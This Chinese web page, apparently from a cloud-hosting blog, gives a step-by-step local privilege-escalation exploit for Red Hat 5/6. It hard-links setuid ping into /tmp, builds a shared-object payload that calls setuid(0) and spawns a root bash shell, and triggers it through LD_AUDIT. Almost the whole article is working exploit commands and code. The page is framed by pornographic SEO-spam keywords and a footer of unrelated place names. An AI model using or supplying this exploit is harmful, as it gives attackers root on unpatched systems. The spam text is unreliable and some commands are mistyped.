亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Redhat利用漏洞提權

發布時間:2020-07-21 12:41:09 來源:網絡 閱讀:4589 作者:jikecom 欄目:安全技術

漏洞試用系統:redhat 56通用

 

.利用/tmp擁有777的權限

/tmp下創建一個exploit目錄

 

ln   /bin/pingping命令的權限很特殊是S,可以在普通用戶使用這個命令的時候瞬間擁有這個命令的屬主權限,這里是root

 

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/


 

 

.vim編寫一段C語言程序(文件名payload.c

 

void  __attribute__((constructor))  init()  //這里__是兩個下劃線

{

         setuid(0);

         system(“/bin/bash”);

}


 

使用GCC把這個文件編譯一下

 

Gcc -w –fpic –shared –o /tmp/exploit payload.c

 

 

.執行

 

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

连云港市| 土默特右旗| 股票| 佛教| 伊宁市| 大荔县| 万盛区| 蚌埠市| 甘德县| 普陀区| 彰化县| 吉安县| 天峨县| 酒泉市| 满洲里市| 梅州市| 峨山| 彩票| 神池县| 德安县| 滁州市| 禹州市| 南宁市| 金乡县| 尖扎县| 扶风县| 平江县| 德州市| 衡水市| 云南省| 茌平县| 张家口市| 汽车| 万源市| 金湖县| 鄂托克旗| 六枝特区| 冷水江市| 文成县| 西畴县| 辽源市|